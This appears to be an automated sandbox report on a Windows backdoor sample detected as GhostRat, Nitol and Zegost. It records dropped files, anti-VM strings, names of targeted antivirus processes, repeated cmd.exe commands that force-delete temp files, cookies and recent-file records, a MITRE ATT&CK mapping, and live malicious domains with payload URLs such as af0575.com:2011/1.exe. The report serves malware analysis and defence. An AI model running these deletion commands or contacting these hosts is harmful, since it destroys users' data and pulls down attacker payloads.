Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: .exe.0.dr	Binary or memory string: 00-05-69 VMWARE, Inc.
Source: .exe, 00000005.00000003.1360796714.0000000002456000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00-1C-14 VMware, IncG
Source: svchost.exe, 00000008.00000002.2651704250.000000000084C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000002.00000002.1330252488.000000000076D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	API call chain: ExitProcess graph end node	graph_0-3101
Source: C:\Windows\Temp\v5.exe	API call chain: ExitProcess graph end node	graph_2-1409
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node	graph_3-20248
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node	graph_3-20271
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node	graph_3-20269
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node	graph_3-20255
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node	graph_3-19464
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node	graph_3-19945
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\server.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F3A0 BlockInput,BlockInput,

3_2_1000F3A0

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405CFF

Source: C:\Windows\Temp\server.exe

Code function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,

3_2_00401000

Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044F257 SetUnhandledExceptionFilter,		5_2_0044F257
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044F26B SetUnhandledExceptionFilter,		5_2_0044F26B

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,

3_2_1000F840

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,

3_2_1000F840

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,

5_2_00401680

Source: C:\Windows\Temp\ .exe

5_2_00401680

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10025DC0 cpuid

3_2_10025DC0

Source: C:\Windows\Temp\ .exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	5_2_0045F814
Source: C:\Windows\Temp\ .exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	5_2_00401060
Source: C:\Windows\Temp\ .exe	Code function: GetLocaleInfoA,	5_2_00451400

Source: C:\Windows\Temp\ .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\Temp\ .exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00402AD0 LoadLibraryA,LoadLibraryA,6D0C6DE0,6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,memset,lstrcmp,sprintf,sprintf,sprintf,Sleep,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep,

2_2_00402AD0

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_10007070

Source: C:\Windows\Temp\ .exe

Code function: 5_2_00433020 SendMessageA,SendMessageA,RegQueryValueExA,SystemTimeToVariantTime,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTimeZoneInformation,SendMessageA,SendMessageA,SendMessageA,SendMessageA,RegOpenKeyExA,SendMessageA,SendMessageA,

5_2_00433020

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_004059FF

Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Native API	13 Windows Service	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	121 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	13 Windows Service	21 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	Login Hook	12 Process Injection	1 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	65 System Information Discovery	SSH	Keylogging	1 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Network Share Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Masquerading	DCSync	351 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Virtualization/Sandbox Evasion	Proc Filesystem	231 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	12 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Indicator Removal	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	1 Remote System Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	Command Obfuscation	GUI Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
G3izWAY3Fa.exe	70%	Virustotal		Browse
G3izWAY3Fa.exe	87%	ReversingLabs	Win32.Backdoor.Zegost
G3izWAY3Fa.exe	100%	Avira	HEUR/AGEN.1337945

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\SysWOW64\033726\svchost.exe	100%	Avira	BDS/Zegost.birna
C:\Windows\SysWOW64\034031\svchost.exe	100%	Avira	BDS/Zegost.birna
C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	100%	Avira	BDS/Zegost.birna
C:\Windows\XXXXXX05CA35CC\svchsot.exe	100%	Avira	BDS/Zegost.birna
C:\Windows\SysWOW64\033726\RCX773C.tmp	100%	Avira	BDS/Zegost.birna
C:\Windows\Temp\server.exe	100%	Avira	BDS/Zegost.birna
C:\Windows\Temp\v5.exe	100%	Avira	TR/Staser.apzjs
C:\Windows\SysWOW64\034031\RCX8B31.tmp	100%	Avira	BDS/Zegost.birna
C:\Windows\SysWOW64\033726\svchost.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\034031\svchost.exe	100%	Joe Sandbox ML
C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	100%	Joe Sandbox ML
C:\Windows\XXXXXX05CA35CC\svchsot.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\033726\RCX773C.tmp	100%	Joe Sandbox ML
C:\Windows\Temp\server.exe	100%	Joe Sandbox ML
C:\Windows\Temp\v5.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\034031\RCX8B31.tmp	100%	Joe Sandbox ML
C:\Windows\SysWOW64\033726\svchost.exe	95%	ReversingLabs	Win32.Backdoor.Farfli
C:\Windows\Temp\ .exe	4%	ReversingLabs
C:\Windows\Temp\server.exe	95%	ReversingLabs	Win32.Backdoor.Farfli
C:\Windows\Temp\v5.exe	100%	ReversingLabs	Win32.Trojan.MintZard
C:\Windows\XXXXXX05CA35CC\svchsot.exe	95%	ReversingLabs	Win32.Backdoor.Farfli

Name	IP	Active	Malicious	Reputation
chinagov.8800.org	8.7.198.46	true	true	unknown
www.af0575.com	unknown	unknown	true	unknown
www.wk1888.com	unknown	unknown	true	unknown
www.fz0575.com	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.af0575.com:2011/1.exe8	server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.wk1888.com:2011/1.exer	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.af0575.com:2011/1.exe	server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.af0575.com:2011/1.exer	svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.fz0575.com:2011/1.exe	server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	false	unknown
